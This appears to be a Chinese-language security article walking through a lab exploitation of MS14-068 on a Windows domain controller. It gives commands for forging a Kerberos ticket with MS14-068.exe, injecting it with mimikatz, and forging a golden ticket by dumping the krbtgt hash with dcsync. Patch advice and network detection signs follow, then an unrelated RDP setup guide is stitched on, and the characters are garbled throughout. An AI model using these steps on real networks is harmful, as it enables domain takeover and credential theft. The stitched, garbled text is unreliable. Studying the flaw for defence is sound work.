MS14-068漏洞可謂是威力無窮,在域滲透中,第一步就是應(yīng)該檢測域控是否有這個漏洞,一旦域控沒有打上這個補(bǔ)丁,將會使內(nèi)網(wǎng)滲透變得十分簡單。對于內(nèi)網(wǎng)安全問題,聚銘網(wǎng)絡(luò)也一直進(jìn)行跟蹤守護(hù),切實協(xié)助企業(yè)組織做好網(wǎng)絡(luò)安全防護(hù)建設(shè)工作,規(guī)避安全風(fēng)險。
遠(yuǎn)程權(quán)限提升漏洞存在于Microsoft Windows的Kerberos KDC實現(xiàn)中。存在該漏洞的癥狀是,Microsoft Kerberos KDC實現(xiàn)無法正確驗證簽名,這可能造成Kerberos服務(wù)票證的某些方面被人偽造。簡單來說就是一個域內(nèi)的普通賬戶可以利用此漏洞進(jìn)行權(quán)限提升,升級為域管理員權(quán)限。
Microsoft Windows Windows Server 2012 GoldR2
Microsoft Windows Windows Server 2012 Gold
Microsoft Windows Windows 7 SP1
Microsoft Windows Vista SP2
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2008 SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows 8.1
Microsoft Windows 8
域控沒有打MS14-068補(bǔ)丁,攻擊者拿下了一臺域內(nèi)的普通計算機(jī)并獲得普通域用戶以及密碼/hash值以及用戶suid。
1.搭建環(huán)境
域控制器:windows 2008 r2域內(nèi)主機(jī):windows 7MS14-068.exemimikatz工具
2.漏洞利用
1)查看域控是否有MS14-068這個漏洞,利用命令systeminfo,查看是否打補(bǔ)?。↘B3011780),下圖中沒有看到打MS14-068相關(guān)漏洞的補(bǔ)丁。
2)登陸域內(nèi)主機(jī)利用whoami/all查看自己的用戶名以及sid
3)利用MS14-068.exe生成一個新的票據(jù):MS14-068.exe -u user@domain -s sid -d域控ip -p密碼(出現(xiàn)報錯的話一般是密碼錯誤)
4)查看dir \域控計算機(jī)名稱\c$
5)利用mimikatz先清除票據(jù),再導(dǎo)入剛剛制作新的票據(jù)
(1) Kerberos::purge #清除票據(jù)
(2) Kerberos::list #列出票據(jù)
(3) Kerberos::ptc 票據(jù)位置 #導(dǎo)入票據(jù)
6)復(fù)現(xiàn)成功。再次利用dir \域控計算機(jī)名稱\c$,發(fā)現(xiàn)提升到管理員權(quán)限,表明復(fù)現(xiàn)成功。
7)黃金票據(jù)偽造
a.查看用戶krbtgt的hash:
lsadump:dcsync /domain:域名 /all /csv
查看用戶的sid:
lsadump:dcsync /domain:域名 /user:krbtgt
b.制造票據(jù)
Kerberos::golden /admin:system /domain:域名 /sid :.... /krbtgt:...(hash) /ticket:票據(jù)名稱
c.導(dǎo)入票據(jù)
Kerberos::purge
Kerberos::ptt 票據(jù)名稱
d.復(fù)現(xiàn)成功
利用dir \域控名稱\c$,出現(xiàn)目錄,表示成功。
1. 升級補(bǔ)丁
與此同時,請及時做好自查和預(yù)防工作,以免遭受黑客攻擊。
1.正常流量
2.異常流量分析
Client在發(fā)起認(rèn)證請求時,通過設(shè)置include-PAC為False,則返回TGT中不會包含PAC。
異常流量在1.AS-REQ階段終端設(shè)置了pac為false
正常流量在1.AS-REQ階段終端設(shè)置了pac為true
異常流量在3.TGS-REQ階段終端又多了一個pac的設(shè)置,且值為false
正常流量在3.TGS-REQ階段終端沒有關(guān)于pac 的設(shè)置
#挑戰(zhàn)30天在頭條寫日記#
在Windows Server上啟用和配置遠(yuǎn)程桌面服務(wù)(RDP)是允許管理員通過遠(yuǎn)程連接管理服務(wù)器的重要步驟。
操作步驟:
注意:在配置遠(yuǎn)程桌面服務(wù)之前,請確保已經(jīng)登錄到具有管理員權(quán)限的Windows Server帳戶。
步驟 1:打開服務(wù)器管理器。
步驟 2:選擇“遠(yuǎn)程桌面服務(wù)”角色。
步驟 3:角色選擇。
步驟 4:選擇安裝服務(wù)。
步驟 5:確認(rèn)安裝。
步驟 6:配置遠(yuǎn)程桌面服務(wù)。
步驟 7:配置遠(yuǎn)程桌面主機(jī)設(shè)置。
步驟 8:配置 RDP 訪問。
步驟 9:確認(rèn)設(shè)置。
步驟 10:測試 RDP 連接。
完成這些步驟后,您的Windows Server應(yīng)該已配置為允許遠(yuǎn)程桌面連接。